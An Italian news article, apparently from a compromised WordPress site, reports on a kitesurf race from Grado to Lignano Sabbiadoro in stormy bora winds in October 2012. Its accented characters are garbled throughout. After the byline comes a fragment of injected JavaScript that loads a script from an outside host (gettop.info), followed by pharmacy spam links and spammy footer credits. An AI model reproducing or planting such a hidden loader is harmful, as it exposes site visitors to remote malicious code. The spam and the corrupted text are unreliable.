VELA: L’INVERNO PRECOCE NON FRENA LA PASSIONE PER IL MARE: CON LA BORA A OLTRE 30 NODI LA SFIDA CON I KITE DA GRADO A LIGNANO SABBIADORO

UNA TRENTINA GLI ARDIMENTOSI SURFISTI CHE HANNO SFIDATO LA BURRASCA DI BORA SCURA E LA PIOGGIA SU UNA ROTTA PROLUNGATA DI DECINE DI MIGLIA PER RAGGIUNGERE LA META, L’ARENILE DI SABBIADORO, IN PARTE CON IL VENTO CONTRARIO

Una sfida nata tra amici che A? divenuta una gara estrema, in una giornata di maltempo nella quale soltanto l’acqua del mare non ha, fortunatamente per loro, ancora una temperatura invernale. E il vento, la bora scura cioA? accompagnata dalla pioggia, ha soffiato nel Golfo fino a 40 nodi. Dalla spiaggia di Grado all’arenile di Lignano Sabbiadoro in kitesurf in meno di un’ora e tre quarti. Questo il tempo del vincitore, il lignanese Stefano Tucci. Il quale ha stabilito un record di percorrenza delle acque del litorale della Riviera Friulana. Affrontando una rotta difficile, forse tre volte piA? lunga delle 12 miglia che separano l’Isola d’oro da Lignano. PerchAi?? con i kitesurf, i surf sui quali i velisti sono trascinati in avanti dalla suggestiva vela a forma di ala, o aquilone, sospesa a una quindicina di metri di distanza, non A? possibile navigare con il vento in poppa. ma occorre veleggiare a zig zag. CosAi?? come non si puA? navigare nemmeno contro vento. Che A? la situazione che gli impavidi surfisti hanno incontrato nell’accostare all’arenile di Lignano Sabbiadoro, nella zona dell’Hotel Nettuno. Quasi una trentina i partecipanti, che potranno iscrivere sulle loro mute la data del 28 ottobre 2012 come una tappa storica della propria carriera di appassionati. E proprio gli appassionati del mare, che da due domeniche attendevano invano di prendere il largo per confrontarsi nel 22. Campionato autunnale della Laguna di vela, e che si confronteranno nelle festivitAi?? di inizio novembre, si sono ritrovati numerosi ad accogliere sulla spiaggia di Sabbiadoro gli amici che, su mezzi molto piA? a rischio delle barche quanto a incolumitAi?? personale, hanno voluto vivacizzare una ‘tranquilla domenica di burrasca’, rinviando l’operazione del rimessaggio delle loro tavole in attesa di una stagione piA? mite. Il surfing ha dunque posto salde radici nella Riviera Friulana. dopo il successo della 3. Sup Race Lignano, la regata sulle tavole sospinte dalla pagaia, che agli inizi del mese di settembre aveva coinvolto oltre 130 surfisti che avevano remato da Lignano Pineta a Sabbiadoro e ritorno, i primi in poco piA? di 50′ minuti, la specialitAi?? dell’autunno rimane il kitesurf, assieme al windsurf.
Carlo Morandinid.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; online Purchase buy nicotinell gum Purchase online Buy online over the counter creams with tretinoin http://www.augmented-reality-invoker.com/blog/non-classe/buy-nootropil-1200/ http://shamanaconsultinginc.com/2018/02/01/purchase-lopressor-generic/ http://ameg.org.mx/order-plendil-side/

Lascia una risposta

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo